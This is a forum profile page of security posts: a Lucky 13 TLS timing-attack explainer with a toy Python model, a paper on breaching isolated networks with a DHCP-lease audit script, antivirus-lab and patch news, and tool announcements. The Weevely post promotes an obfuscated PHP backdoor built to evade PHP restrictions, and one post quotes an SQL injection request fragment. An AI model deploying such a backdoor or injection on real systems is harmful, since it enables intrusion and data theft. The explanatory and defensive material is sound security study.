Everything posted by Nytro
-
Attack of the week: TLS timing oracles

Ever since I started writing this blog (and specifically, the posts on SSL/TLS) I've had a new experience: people come up to me and share clever attacks that they haven't made public yet. This is pretty neat -- like being invited to join an exclusive club. Unfortunately, being in this club mostly sucks. That's because the first rule of 'TLS vulnerability club' is: You don't talk about TLS vulnerability club. Which takes all the fun out of it. (Note that this is all for boring reasons -- stuff like responsible disclosure, publication and fact checking. Nobody is planning a revolution.)

Anyway, it's a huge relief that I'm finally free to tell you about a neat new TLS attack I learned about recently. The new result comes from Nadhem AlFardan and Kenny Paterson of Royal Holloway. Dubbed 'Lucky 13', it takes advantage of a very subtle bug in the way records are encrypted in the TLS protocol.

If you aren't into long crypto posts, here's the TL;DR: There is a subtle timing bug in the way that TLS data decryption works when using the (standard) CBC mode ciphersuite. Given the right set of circumstances, an attacker can use this to completely decrypt sensitive information, such as passwords and cookies. The attack is borderline practical if you're using the Datagram version of TLS (DTLS). It's more on the theoretical side if you're using standard TLS. However, with some clever engineering, that could change in the future. You should probably patch!

For the details, read on. As always, we'll do this in the 'fun' question/answer format I save for these kinds of posts.

What is TLS, what is CBC mode, and why should I care if it's broken?

Some background: Transport Layer Security (née SSL) is the most important security protocol on the Internet. If you find yourself making a secure connection to another computer, there's a very good chance you'll be doing it with TLS. (Unless you're using a UDP-based protocol, in which case you might use TLS's younger cousin Datagram TLS [DTLS].)

The problem with TLS is that it kind of stinks. Mostly this is due to bad decisions made back in the mid-1990s when SSL was first designed. Have you seen the way people dressed back then? Protocol design was worse. While TLS has gotten better since then, it still retains many of the worst ideas from the era.

One example is the CBC-mode ciphersuite, which I've written about several times before on this blog. CBC-mode uses a block cipher (typically AES) to encrypt data. It's the most common ciphersuite in use today, probably because it's the only mandatory ciphersuite given in the spec.

What's wrong with CBC mode?

The real problem with TLS is not the encryption itself, but rather the Message Authentication Code (MAC) that's used to protect the integrity (authenticity) of each data record. Our modern understanding is that you should always encrypt a message first, then apply the MAC to the resulting ciphertext. But TLS gets this backwards. Upon encrypting a record, the sender first applies a MAC to the plaintext, then adds up to 255 bytes of padding to get the message up to a multiple of the cipher's (e.g., AES's) block size. Only then does it CBC-encrypt the record.

[Figure: Structure of a TLS record. The whole thing is encrypted with CBC mode.]

The critical point is that the padding is not protected by the MAC. This means an attacker can tamper with it (by flipping specific bits in the ciphertext), leading to a very nasty kind of problem known as a padding oracle attack. In these attacks (example here), an attacker first captures an encrypted record sent by an honest party, modifies it, then re-transmits it to the server for decryption. If the attacker can learn whether her changes affected the padding -- e.g., by receiving a padding error as opposed to a bad MAC error -- she can use this information to adaptively decrypt the whole record. The structure of TLS's encryption padding makes it friendly to these attacks.

[Figure: Closeup of a padded TLS record. Each byte contains the padding length, followed by another (pointless, redundant) length byte.]

But padding oracle attacks are well known, and (D)TLS has countermeasures!

The TLS designers learned about padding oracles way back in 2002, and immediately took steps to rectify them. Unfortunately, instead of fixing the problem, they decided to apply band-aids. This is a time-honored tradition in TLS design.

The first band-aid was simple: eliminate any error messages that could indicate to the attacker whether the padding check (vs. the MAC check) is what caused a decryption failure. This seemed to fix things for a while, until some researchers figured out that you could simply time the server to see how long decryption takes, and thereby learn if the padding check failed. This is because implementations of the time would first check the padding, then return immediately (without checking the MAC) if the padding was bad. That resulted in a noticeable timing differential the attacker could detect.

Thus a second band-aid was needed. The TLS designers decreed that decryption should always take the same amount of time, regardless of how the padding check comes out. Let's roll the TLS 1.2 spec:

[T]he best way to do this is to compute the MAC even if the padding is incorrect, and only then reject the packet. For instance, if the pad appears to be incorrect, the implementation might assume a zero-length pad and then compute the MAC.

Yuck. Does this even work?

Unfortunately, not quite. When the padding check fails, the decryptor doesn't know how much padding to strip off. That means they don't know how long the actual message is, and therefore how much data to MAC. The recommended countermeasure (above) is to assume no padding, then MAC the whole blob. As a result, the MAC computation can take a tiny bit longer when the padding is damaged.

The TLS designers realized this, but by this point they were exhausted and wanted to go think about something else. So they left us with the following note:

This leaves a small timing channel, since MAC performance depends to some extent on the size of the data fragment, but it is not believed to be large enough to be exploitable, due to the large block size of existing MACs and the small size of the timing signal.

And for the last several years -- at least, as far as we know -- they were basically correct.

How does this new paper change things?

The new AlFardan and Paterson result shows that it is indeed possible to distinguish the tiny timing differential caused by invalid padding, at least from a relatively close distance -- e.g., over a LAN. This is partly due to advances in computing hardware: most new computers now ship with an easily accessible CPU cycle counter. But it's also thanks to some clever statistical techniques that use many samples to smooth out and overcome the jitter and noise of a network connection.

The upshot is that the new technique can measure timing differentials of less than 1 microsecond over a LAN connection -- for example, if the attacker is in the same data center as your servers. It does this by making several thousand decryption queries and processing the results. Under the right circumstances, this turns out to be enough to bring (D)TLS padding oracle attacks back to life.

How does the attack work?

For the details, you should obviously read the full paper or at least the nice FAQ that Royal Holloway has put out. Here I'll try to give some intuition.

Before I can explain the attack, you need to know a little bit about how hash-based MACs work. TLS typically uses HMAC with either MD5, SHA1 or SHA256 as the hash function. While these are very different hash functions, the critical point is that each one processes messages in 64-byte blocks. Consequently, hashing time is a function of the number of blocks in the message, not the number of bytes. Going from a 64-byte input to a 65-byte input means an entire extra block, and hence a (relatively) large jump in the amount of computation time (an extra iteration of the hash function's compression function).

There are a few subtleties in here. The hash functions incorporate an 8-byte length field plus some special hash function padding, which actually means a one-block message can only contain about 55 bytes of real data (which also includes the 13-byte record header). The HMAC construction adds a (constant) amount of additional work, but we don't need to think about that here.

So in summary: you can get 55 bytes of data into one block of the hash. Go a single byte beyond that, and the hash function will have to run a whole extra round, causing a tiny (500-1000 hardware cycle) delay.

The attack here is to take a message that -- including the TLS padding -- would fall above that 55 byte boundary. However, the same message with padding properly removed would fall below it. When an attacker tampers with the message (damaging the padding), the decryption process will MAC the longer version of the message -- resulting in a measurably higher computation time than when the padding checks out. By repeating this process many, many thousand (or millions!) of times to eliminate noise and network jitter, it's possible to get a clear measurement of whether the decryption succeeded or not. Once you get that, it's just a matter of executing a standard padding oracle attack.

But there's no way this will work on TLS! It'll kill the session!

Please recall that I described this as a practical attack on Datagram TLS (DTLS) -- and as a more theoretical one on TLS itself.* There's a reason for this. The reason is that TLS (and not DTLS) includes one more countermeasure I haven't mentioned yet: anytime a record fails to decrypt (due to a bad MAC or padding error), the TLS server kills the session. DTLS does not do this, which makes this attack borderline practical. (Though it still takes millions of packet queries to execute.)

The standard TLS 'session kill' feature would appear to stop padding oracle attacks, since they require the attacker to make many, many decryption attempts. Killing the session limits the attacker to one decryption -- and intuitively that would seem to be the end of it. But actually, this turns out not to be true.

You see, one of the neat things about padding oracle attacks is that they can work across different sessions (keys), provided that (a) your victim is willing to re-initiate the session after it drops, and (b) the secret plaintext appears in the same position in each stream. Fortunately the design of browsers and HTTPS lets us satisfy both of these requirements.

To make a target browser initiate many connections, you can feed it some custom Javascript that causes it to repeatedly connect to an SSL server (as in the CRIME attack). Note that the Javascript doesn't need to come from the target webserver -- it can even be served on an unrelated non-HTTPS page, possibly running in a different tab. So in short: this is pretty feasible.

Moreover, thanks to the design of the HTTP(S) protocol, each of these connections will include cookies at a known location in the HTTP stream. While you may not be able to decrypt the rest of the stream, these cookie values are generally all you need to break into somebody's account.

Thus the only practical limitation on such a cookie attack is the time it takes for the server to re-initiate all of these connections. TLS handshakes aren't fast, and this attack can take tens of thousands (or millions!) of connections per byte. So in practice the TLS attack would probably take days. In other words: don't panic. On the other hand, don't get complacent either. The authors propose some clever optimizations that could take the TLS attack into the realm of the feasible (for TLS) in the near future.

How is it being fixed?

With more band-aids of course! But at least this time, they're excellent band-aids. Adam Langley has written a 500-line OpenSSL patch (!) that modifies the CBC-mode decryption procedure to wipe out the timing differentials used by this attack. I would recommend that you think about updating at least your servers in the future (though we all know you won't). Microsoft products (originally: should also see updates soon) are allegedly not vulnerable to this attack, so won't need updates.**

Still, this is sort of like fixing your fruitfly problem by spraying your kitchen with DDT. Why not just throw away the rotted fruit? In practice, that means moving towards modern AEAD ciphersuites like AES-GCM, which should generally end this madness. We hope.

Why not switch to RC4?

RC4 is not an option in DTLS. However, it will mitigate this issue for TLS, since the RC4 ciphersuite doesn't use padding at all. In fact, this ancient ciphersuite has been (hilariously) enjoying a resurgence in recent years as the 'solution' to TLS attacks like BEAST. Some will see this attack as further justification for the move. But please don't do this. RC4 is old and creaky, and we really should be moving away from it too.

So what's next for TLS?

I'd love to say more, but you see, the first rule of TLS vulnerability club is...

Notes:

* The attack on Datagram TLS is more subtle, and a lot more interesting. I haven't covered it much in this post because TLS is much more widely used than DTLS. But briefly, it's an extension of some previous techniques -- by the same authors -- that I covered in this blog last year. The gist is that an attacker can amplify the impact of the timing differential by 'clogging' the server with lots of unrelated traffic. That makes these tiny differentials much easier to detect.

** And if you believe that, I have a lovely old house in Baltimore to sell you...

Posted by Matthew Green at 4:00 AM
Source: A Few Thoughts on Cryptographic Engineering: Attack of the week: TLS timing oracles
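An added example, not part of the quoted post or of the Lucky 13 paper: a toy model of the TLS 1.x MAC-then-pad record check that counts HMAC-SHA1 compression-function calls, which is the quantity the timing side channel leaks. It works on the plaintext that CBC decryption would produce (the cipher itself is left out, since AES time does not depend on the padding), uses a constructed 20-byte key, and applies the RFC 5246 "assume a zero-length pad on bad padding" rule the post quotes. The 64-byte record size and the 0x01 0x01 versus 0x00 padding cases are chosen so that the MAC input straddles the 55-byte single-block boundary described above.

```python
"""Toy model of the Lucky 13 timing leak in TLS 1.x CBC records (MAC-then-pad-then-encrypt).

Only the post-decryption plaintext is modelled; the timing difference lives in the
HMAC computation, whose cost is measured here as compression-function calls.
"""
import hashlib
import hmac

HASH_BLOCK = 64   # MD5, SHA-1 and SHA-256 all compress 64-byte blocks
MAC_LEN = 20      # HMAC-SHA1 tag length
LEN_FIELD = 8     # Merkle-Damgard trailer: 0x80, zeros, 8-byte bit length


def hash_blocks(msg_len: int) -> int:
    """Compression calls needed to hash msg_len bytes once padding/length are appended."""
    return (msg_len + 1 + LEN_FIELD + HASH_BLOCK - 1) // HASH_BLOCK


def hmac_compressions(msg_len: int) -> int:
    """HMAC = H((K^opad) || H((K^ipad) || msg)); both hashes start with a 64-byte key block."""
    inner = hash_blocks(HASH_BLOCK + msg_len)
    outer = hash_blocks(HASH_BLOCK + MAC_LEN)
    return inner + outer


def tls_header(seq: int, data_len: int) -> bytes:
    """13-byte MAC header: seq_num(8) || content type(1) || version(2) || length(2)."""
    return seq.to_bytes(8, "big") + b"\x17" + b"\x03\x03" + data_len.to_bytes(2, "big")


def build_record(key: bytes, seq: int, data: bytes, pad_len: int) -> bytes:
    """Sender side: data || HMAC(header || data) || pad, where all pad bytes equal pad_len-1."""
    assert 1 <= pad_len <= 256
    tag = hmac.new(key, tls_header(seq, len(data)) + data, hashlib.sha1).digest()
    return data + tag + bytes([pad_len - 1]) * pad_len


def padding_length(plain: bytes):
    """Return the pad length if the TLS padding is well formed, else None."""
    p = plain[-1]
    if p + 1 > len(plain) - MAC_LEN:
        return None
    if any(b != p for b in plain[-(p + 1):]):
        return None
    return p + 1


def check_record(key: bytes, seq: int, plain: bytes):
    """Receiver side per RFC 5246 6.2.3.2: on bad padding assume a zero-length pad, MAC anyway.

    Returns (accepted, compression_calls). The second value is what an attacker times.
    """
    pad_len = padding_length(plain)
    pad_ok = pad_len is not None
    if not pad_ok:
        pad_len = 0                      # the band-aid: MAC the whole blob
    data = plain[: len(plain) - MAC_LEN - pad_len]
    tag = plain[len(data): len(data) + MAC_LEN]
    mac_input = tls_header(seq, len(data)) + data
    expected = hmac.new(key, mac_input, hashlib.sha1).digest()
    mac_ok = hmac.compare_digest(expected, tag)
    return (pad_ok and mac_ok), hmac_compressions(len(mac_input))


def lucky13_demo():
    """Three 64-byte records (four AES blocks) that differ only in how the padding checks out."""
    key = b"k" * 20                      # constructed MAC key, not a real session key
    seq = 1
    good2 = build_record(key, seq, b"A" * 42, 2)   # pad 0x01 0x01 -> MAC over 13 + 42 = 55 bytes
    good1 = build_record(key, seq, b"A" * 43, 1)   # pad 0x00      -> MAC over 13 + 43 = 56 bytes
    bad = bytearray(good2)
    bad[-1] ^= 0x80                      # attacker damages the padding (via the previous CBC block)
    return {
        "pad2": check_record(key, seq, good2),
        "pad1": check_record(key, seq, good1),
        "tampered": check_record(key, seq, bytes(bad)),
    }


if __name__ == "__main__":
    for name, (ok, calls) in lucky13_demo().items():
        print(f"{name:9s} accepted={ok!s:5s} compression_calls={calls}")
```

The valid two-byte pad costs 4 compressions while both the one-byte pad and the damaged pad cost 5, so a server that follows the spec's advice still answers "was the padding 0x01 0x01?" through timing alone. The OpenSSL fix mentioned above removes this by performing the same number of compression calls whatever the padding byte says.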
-
It's not free. You "paid" for Windows and Office.
-
Huge security patch from Microsoft
by Hit editorial staff | 8 February 2013

Next week Microsoft will publish a security update for Windows containing no fewer than 57 patches to eliminate bugs. The package will contain 12 security updates, five of which are considered critical. Targeted for vulnerability removal are Windows, Internet Explorer and the Office suite. Of the total number of updates, five are dedicated to Windows 7, four to Windows 8 and three to Windows XP SP3, according to representatives of nCircle. This is not the first time Microsoft has published such "monster" packages of security updates, writes Computerworld. In April 2011, the company made available to users a patch with no fewer than 64 updates for removing vulnerabilities in its programs.

Source: Computerworld.com
Via: Patch de securitate urias de la Microsoft | Hit.ro
-
APISPY32 Be sure to read Readme.txt! It now works with executables that have their IAT merged into read-only data sections. I've run it successfully on Windows 2000 and Windows XP. Oldie... http://www.wheaty.net/APISPY32.zip
-
How an antivirus testing center works

An article from the "how it works" series, but I'm not showing you a car factory or the eMAG warehouse; instead, an antivirus testing center. There are two big independent testing organizations in the world: AV-Comparatives in Austria, more precisely in Innsbruck, and AV-Test in Germany. Right now I'm at AV-Comparatives. What you see below is the test control room.

Comparative tests are very complex because:
- real computers are used, not virtual machines (some viruses behave differently on a VM).
- testing is done on normal configurations, similar to the commercial average in terms of hardware and installed software.
- security programs are tested against roughly 200,000 to 300,000 viruses discovered in recent months plus many phishing and malware URLs.
- in every test, screenshots and logs are taken of modified files, of what the antivirus detected and how, of when and how it reacted, plus video clips.
- situations are saved for later replication.

Hence the amazing configuration of the testing center:
- the racks on the left are full of workstations, several dozen of them.
- 25 monitors are available to be connected to the stations.
- the rack on the right contains control servers and 400 TB of storage.
- in total they have 600 GB of RAM installed in the equipment.
- the control server runs software developed by AV-Comparatives that starts and stops the test stations, installs the operating system on them, attacks them, makes them browse dubious sites, watch pornography, click links in weird emails and install every toolbar they are offered. The same server also takes screenshots, videos, logs and everything else.
- they have 3 independent internet connections, 256 IPs and access to IPs from all over the world (some malware only infects certain countries, so it has to look as if you are from there).

Why are the results of AV-Comparatives tests held in such high regard? Because they have a very well designed, exhaustive test procedure that minimizes the chance of getting a test wrong, and because they are an independent organization. It's the kind of industry where not only the result matters but also who ran the test, and AV-Comparatives is a respected name worldwide.

Why would you believe they are independent? I believed them. I saw here only people passionate about this field, people who started from scratch out of a desire to test for real and built a large and beautiful organization. Moreover, the test procedure, every detail of it, is discussed with every antivirus vendor, and those with objections can ask for it to be changed. After testing, vendors have access to all the logs and detailed results, so if they consider they were penalized needlessly or that tests were wrong they can contest and everything can be re-simulated.

Part of the independence also comes from the funding model. AV-Comparatives asks for a fixed amount from every vendor that wants to enter a product in the test, a kind of participation fee. In addition they are funded by two universities through research programs (Innsbruck and Hong Kong), by a technology development institute and by the Austrian state, which wants to know which antivirus to buy. AV-Comparatives makes no profit. They have annual expenses of around 500,000 euros and cover them from these sources without making a profit.

The programmers who wrote the automated control and testing software (I met them yesterday, young guys) built a beauty of a program. I saw screenshots and, as complex as it is, it seemed just as easy to understand at a glance. Not only the reporting and logging part: even the periodically taken screenshots are run through OCR programs that identify any messages from the antivirus, automating the whole process.

I also appreciated the attention to detail. Malware URLs are tested simultaneously, because over time they disappear or get reported as malicious. Well, not exactly simultaneously, but with a 5-second delay so as not to start all the machines at exactly the same time and create a kind of spam there. And they test simulating IPs from a certain country, but always changing them, because some malware doesn't infect the same IP twice, and even with various localized Windows settings. As I said, passionate people attentive to every detail. Nothing I heard them do seemed "haphazard" to me.

Does such an award from AV-Comparatives matter? Yes, a lot. When a magazine like PC Magazine, with millions of readers, says "buy Bitdefender because the experts at AV-Comparatives say it's the best and we trust them", that's something. Then in the corporate world there are many technical teams that can't test every program on the market themselves when choosing software for a company with thousands of computers, but who trust AV-Comparatives and their results. It's like when you're sick and trust what your doctor recommends; you don't start learning medicine from scratch. Well, I have no doubt that here at home there will be many who say they know better that X is better and Y is slower and Z detects nothing, based not on tests with 300,000 viruses but on 1-2 personal mishaps.

On another occasion I'll tell you more about Bitdefender, because I had the chance to chat with the company's CEO, Mr. Florin Talpeș. Until then, below is a ranking of antivirus products from the results of a Real World Protection Test from last year:

Bitdefender
G Data
Trend Micro
F-Secure
BullGuard
Qihoo 360 (popular in China)
Kaspersky

The ones in bold use Bitdefender technology, bought from the Romanians by the respective companies in the form of partnerships. I've told you before that we have every reason to be proud that software this high-performing and advanced in terms of detection technology is produced entirely in Romania.

Source: Cum funcționează un centru pentru testarea antivirușilor | nwradu blog
-
fixed realm buffer size. Not professional at all...
-
Must see: DevOps Reactions
-
If they did it here, let's suppose:
1. A user downloads from filelist at 10 MB/s
2. Average traffic is 100 KB/s

Bucharest, 2 million inhabitants, 510,000 people with internet access, 10,000 downloading from filelist.

10,000 * 10 MB + 500,000 * 0.1 MB/s = 100,000 MB/s + 50,000 MB/s = 100 TB/s + 50 TB/s = 150 TB/s

Of which let's suppose RDS has 100 TB/s. Filtering all those packets doesn't seem impossible, but it seems almost impossible.

Well, realistically speaking, with the "Big Brother" law under which ISPs were obliged to keep logs, they probably store the connection endpoints, source and destination IP, which means the packets are already being "unpacked". This also means that, skipping over the TCP/IP headers, one can easily obtain the line "GET /page.php?id=-1 union..." and the line "Host: www.rds.ro" to be kept in the logs.

What do you think? In any case, TOR rules!
-
Penetrating and Achieving Persistence in Highly Secured Networks
By: Bogdan Botezatu

Only a couple of years ago, cyber-criminals almost exclusively targeted Internet-connected end-users and companies. Now, high profile attacks target isolated, highly secure corporate or business environments. This paper describes the challenges of breaching such systems, achieving persistence for as long as possible, and payload delivery mechanisms.

Ever since governments and companies adopted the Internet on a massive scale, cyber-criminals have become interested in breaching these critical infrastructures and monetizing them in various ways, with particular focus on disruption and information theft. The continuous siege from outside hostile parties has prompted businesses, enterprises, governments and mission-critical service companies such as utility providers to isolate their networks and render them inaccessible (or limit their accessibility) to the outside world. As a rule, the more critical the network is, the higher the degree of isolation.

How is successful penetration carried out in isolated environments?

One of the most frequent mistakes when deploying a highly secure network is allowing it to be extended without the intervention of a network administrator. Many times, employees trade security for usability without even realizing they are exposing the network to outside threats. Wireless access points installed without notification and without proper security, public and private network bridging through proxy servers, or the installation of other devices for tethering (i.e. mobile phones or 3G modems) can and will annihilate any safety mechanism the network administrator has in place.

An advanced persistent threat attack begins with either exploiting one of the technical vulnerabilities exposed above, or by social engineering the user into breaking the security protocols of the organization, such as the restriction on plugging a USB drive into computers that are part of the private network. The goal of an advanced persistent threat is gaining prolonged access to an organization's resources for monitoring or sabotage.

Figure 1: Vulnerable spots of a protected network. Wireless extensions and unauthorized gateways to the Internet expose the network to outside attackers.

Exploitation of an unauthorized extension of the network with wireless devices is the easiest method by which a cyber-criminal in close proximity can gain access to a protected environment. In the absence of a strong audit of the network configuration, legitimate users could add a wireless router in a spare Ethernet outlet or even bridge a wireless connection to work in access point mode. Most of the time, these are not deliberate acts of sabotage, but fatal mistakes aimed at enhancing the usability of a restrictive networking environment (i.e. sharing the local internet connection with a smartphone or creating a wireless connection in the meeting room without consent from the network administrator). This way, any nearby attacker can probe the Wi-Fi space for unprotected or poorly-secured networks, then use open-source tools to attack WEP, WPA, LEAP or even VPNs and other proprietary wireless technologies[1]. Once the network has been identified, cracking the rudimentary encryption would allow the attacker to connect to the network to access resources.

Mitigation: As a system administrator, you should always disable any Ethernet outlet that is not in permanent use directly from the patch panel in the server room. Configure your DHCP server to lease IPs by MAC addresses only. Talk to employees about the importance of keeping the network isolated at all times. Make them understand that any modification to the network infrastructure will have disastrous effects. Use Wi-Fi space monitoring tools to detect wireless signals originating from your facility. A simple $10 key fob Wi-Fi signal detector is often enough to identify illegal access points in your organization.

Unregulated access to the internet via 3G modems or 3G tethering defeats the purpose of isolating the network environment. Whenever the user connects to the internet through a personal device from a machine that is part of the isolated network, they become a perfect target for blended threats: malware delivered via well-formatted e-mail messages that trick the user into either downloading an infected and apparently innocuous attachment (such as a PDF or document file) or prompt the user to visit a legitimate website hosting malware.

Mitigation: Enforce security policies on all computers connected to the network. Disable or render USB ports physically inaccessible to prevent storage devices from connecting to the PC. This way, users can't inadvertently plant malware and can't move stolen information outside of the network. Block Bluetooth and wireless on host computers to disallow file transfers and interconnection with user-owned devices.

Personal storage and multimedia devices arbitrarily plugged into network computers can act as highly effective vectors not only for malware, but also for the information that escapes the network to the attacker's command and control server. This approach, although less effective than directly sending data to the attacker via the Internet, has proven much more successful in high-profile attacks such as the Flamer incident[2].

Last, but not least, mind the physical security of the facility. Even the most secured networking environment is useless if physical access to the facility, data center or server room is lax or unregulated. Skilled social engineers can cut their way through office buildings; determined attackers can convince or coerce personnel with access to the building (employees, janitorial team, maintenance crew) to plant devices for them and open security breaches at the network perimeter. The DARPA-funded Pwnie Express products[3], for instance, are disguised as power strips and can be connected to the network, then used by attackers for persistent access to the network over 3G.

Achieving persistence in isolated environments

For long-term exploitation of the isolated network, attackers use a combination of malware tools that take care of deployment, data and password gathering, scanning the network perimeter and reporting. These tools keep a low profile and are specially designed to evade antivirus detection. The evasion is possible because, most of the time, the cyber-criminal team behind the attack uses brand-new code that has never been seen in the wild by antivirus vendors. Zero-day exploitation against client software plays a key role in the stealthy dissemination of the payload across the network, aided by unconventional malware programming using less known APIs and next to no obfuscation of the malicious code.

A key advantage of an isolated environment is that it is considered clean and virus-free. By design, they allow no intrusion from the outside, as they are rarely connected to other networks. More than that, one of the most effective means of defense against malware is only partially functional: in the absence of a permanent connection to the internet to deliver hourly malware signature updates, the antivirus uses only outdated signatures and behavioral patterns, two technologies that are highly ineffective against brand-new malicious code engineered to conceal suspicious behavior. We know advanced malicious code used in breaching isolated networks often comes unencrypted, unpacked and needs no internet connection to operate. These features are critical in evading antivirus detection that monitors code changes, entropy and typical malicious behavior. This was the case of Flamer, the world's largest piece of malware, which avoided detection by having the exact opposite features of modern, commercial malware. In the absence of an antivirus solution to flag the intrusion, it is up to the network administrator to mitigate a possible infection by constantly monitoring network traffic and ensuring that security policies are enforced.

Figure 2: The circuit of a Flamer-infected device: the employee is used both as a vector of infection and as a carrier for stolen data.

Payload delivery and operation mechanism

One of the most frequently encountered misconceptions is that a piece of malware is only harmful when it can actively communicate with the command and control server. While this is mostly true for consumer-grade malware that specializes in sending spam, harvesting addresses or manipulating banking transactions, the outlook is different for military-grade e-threats the size and complexity of Stuxnet, Duqu or Flamer. Malware specializing in cyber-espionage rarely relies on the local connection to the Internet to siphon data outside of the perimeter. That approach would likely trigger firewall alerts; the huge amount of data sent to the C&C server is also likely to be visible to packet inspection applications such as Wireshark, which will compromise the operation. More likely, the attackers use an employee's removable device as transportation between the isolated network and an unmonitored, compromised workstation at the employee's home, for instance.

Not all malware is tailored for espionage and persistence; some is rather focused on delivering a payload or fulfilling a mission. This was the case of Stuxnet, the world's first piece of malware tailored to subvert an industrial system in order to compromise the production process at the Natanz-based uranium enrichment facility in Iran. The e-threat was specifically designed to seize control of the Siemens Simatic WinCC SCADA applications controlling centrifuge machines and did not affect computers or networks that did not meet specific architecture requirements.

Conclusion

Isolated networks are the ultimate fortresses, but they are penetrable. The ecosystem is as safe as its weakest link: the human user, be it employee, system or network administrator. The Stuxnet and Flamer incidents have demonstrated that even the most secured networks are no match for cyber-weapons, instruments designed to go where no piece of malware has gone before. These instruments, which likely share the same origin, prove that highly-skilled cyber-criminal groups can always take the game one step further and bring more and more sophisticated threats to outsmart defense mechanisms.

[1] Jeremy Faircloth, Penetration Tester's Open Source Toolkit, third edition, Elsevier, 2011
[2] Bogdan Botezatu, FLAME – The Story of Leaked Data Carried by Human Vector | Bitdefender Labs
[3] Power Pwn | Pwnie Express

About The Author
Bogdan Botezatu, Senior E-Threat Analyst

Bogdan Botezatu is living his second childhood at Bitdefender as senior e-threat analyst. When he is not documenting sophisticated strains of malware or writing removal tools, he teaches extreme sports such as surfing the web without protection or rodeo with wild Trojan horses. He believes that most things in life can be beaten with strong heuristics and that antimalware research is like working for a secret agency: you need to stay focused at all times, but you get all the glory when you catch the bad guys.

Source: Penetrating and Achieving Persistence in Highly Secured Networks | HOTforSecurity
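An added example, not part of the article above or of any Bitdefender tooling, for the "lease IPs by MAC address only" and "audit the network configuration" mitigations: it parses the ISC dhcpd.leases text format, compares every active lease against an asset inventory, and reports hardware addresses the administrator never registered (an unregistered consumer router quietly bridged into a spare outlet shows up here as a new client). The lease entries, the inventory and the hostnames are constructed for the demonstration.

```python
"""Flag DHCP leases handed out to hardware addresses that are not in the asset inventory.

Reads the ISC dhcpd.leases format: a sequence of 'lease <ip> { ... }' blocks whose
bodies carry 'hardware ethernet', 'binding state' and optional 'client-hostname' lines.
"""
import re
from dataclasses import dataclass

LEASE_RE = re.compile(r"lease\s+(?P<ip>[\d.]+)\s*\{(?P<body>.*?)\}", re.S)
MAC_RE = re.compile(r"hardware ethernet\s+(?P<mac>[0-9a-fA-F:]{17});")
HOST_RE = re.compile(r'client-hostname\s+"(?P<host>[^"]*)";')
STATE_RE = re.compile(r"binding state\s+(?P<state>\w+);")


@dataclass(frozen=True)
class Lease:
    ip: str
    mac: str
    hostname: str
    state: str


def parse_leases(text: str) -> list:
    """Parse dhcpd.leases text; a later block for the same IP supersedes an earlier one."""
    leases = {}
    for m in LEASE_RE.finditer(text):
        body = m.group("body")
        mac = MAC_RE.search(body)
        if mac is None:              # abandoned or malformed entries carry no hardware line
            continue
        host = HOST_RE.search(body)
        state = STATE_RE.search(body)
        leases[m.group("ip")] = Lease(
            ip=m.group("ip"),
            mac=mac.group("mac").lower(),
            hostname=host.group("host") if host else "",
            state=state.group("state") if state else "unknown",
        )
    return list(leases.values())


def unknown_devices(leases: list, inventory) -> list:
    """Active leases whose MAC is absent from the administrator's inventory."""
    allowed = {m.lower() for m in inventory}
    return [lease for lease in leases if lease.state == "active" and lease.mac not in allowed]


# Constructed sample lease file: one inventoried workstation, one unregistered device
# that announces a router-like hostname, and one expired lease that should be ignored.
SAMPLE_LEASES = """
lease 10.0.0.51 {
  starts 4 2013/02/07 10:15:00;
  ends 4 2013/02/07 22:15:00;
  binding state active;
  hardware ethernet 00:1e:c9:aa:bb:01;
  client-hostname "ws-finance-17";
}
lease 10.0.0.77 {
  starts 4 2013/02/07 11:02:13;
  ends 4 2013/02/07 23:02:13;
  binding state active;
  hardware ethernet f4:ec:38:12:34:56;
  client-hostname "TL-WR841N";
}
lease 10.0.0.90 {
  starts 3 2013/02/06 09:00:00;
  ends 3 2013/02/06 21:00:00;
  binding state free;
  hardware ethernet 00:50:56:c0:00:08;
}
"""

# Constructed inventory: MACs the administrator registered (case-insensitive match).
INVENTORY = {"00:1E:C9:AA:BB:01"}


def demo() -> list:
    return unknown_devices(parse_leases(SAMPLE_LEASES), INVENTORY)


if __name__ == "__main__":
    for lease in demo():
        print(f"unregistered client {lease.ip} {lease.mac} hostname={lease.hostname!r}")
```

Run it against the real file (typically /var/lib/dhcp/dhcpd.leases) with a cron job and alert on any output. A MAC allow-list on the DHCP server is only a tripwire, not a control: an attacker who already has a foothold can clone a registered address, so pair it with the physical port shutdown and Wi-Fi survey the article recommends.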
-
[h=1]Weevely 1.0[/h]
by Mayuresh on February 5, 2013

Our old post regarding the weevely tiny PHP backdoor can be found here. Recently, an update was released – weevely version 1.0, which brings new modules with a totally refactored structure to assist remote administration tasks and penetration testing.

"Weevely is an unobtrusive PHP backdoor that simulates a telnet-like connection. It is an essential tool for web application attack post-exploitation or web hosting account management. With a basic permission to upload PHP files, you only need to generate and upload the "server" PHP code on the target, and run Weevely locally to transmit shell commands.

- Backdoor communications are obfuscated into the referrer of regular HTTP requests
- Backdoor code is hidden and compact because functions are dynamically injected and not embedded in
- Users have modules available to automate interaction with the remote system
- Modules implement different techniques to accomplish given tasks, aiming to bypass disabled_functions, safe_mode and other PHP"

[h=2]Changes made in Weevely 1.0:[/h]
- Support for Windows and MacOS host environments
- Module :net.mount, powered by HTTPfs, that automagically mounts the remote filesystem to a local mountpoint
- Module :file.edit to edit remote files with your favourite local text editor
- Module :audit.systemfiles to find system files with bad permissions that could affect server security
- Module :audit.phpconf to audit common PHP misconfigurations
- SOCKS4 and SOCKS5 proxy support
- Totally rewritten module base structure to simplify module deployment
- Module arguments management with argparse
- Tons of bug fixes

[h=3]Download weevely:[/h]
Weevely 1.0 – weevely-1.0.tar.gz / Weevely github

Source: Weevely version 1.0! — PenTestIT
-
[h=1]TLSSLed v1.3[/h]
by Mayuresh on February 6, 2013

We included TLSSLed in our List of SSL Scanners for Penetration Testers! A few days ago, an update was released – TLSSLed version 1.3! This version is the result of testing lots of HTTPS (SSL/TLS) implementations during real-world pen-tests, so it is full of minor improvements and extra checks to identify different behaviors we have found in the wild. Additionally, the tool output has been changed for easy reading and to provide quick information for each finding: negative [-], positive [+], or informational [.] (as well as grouping tests [*] and highlighting warning and error messages [!]).

"TLSSLed is a Linux shell script whose purpose is to evaluate the security of a target SSL/TLS (HTTPS) web server implementation. It is based on sslscan, a thorough SSL/TLS scanner that is based on the openssl library, and on the "openssl s_client" command line tool. The current tests include checking if the target supports the SSLv2 protocol, the NULL cipher, weak ciphers based on their key length (40 or 56 bits), the availability of strong ciphers (like AES), if the digital certificate is MD5 signed, and the current SSL/TLS renegotiation capabilities."

[h=2]This is the official change log for TLSSLed v1.3:[/h]
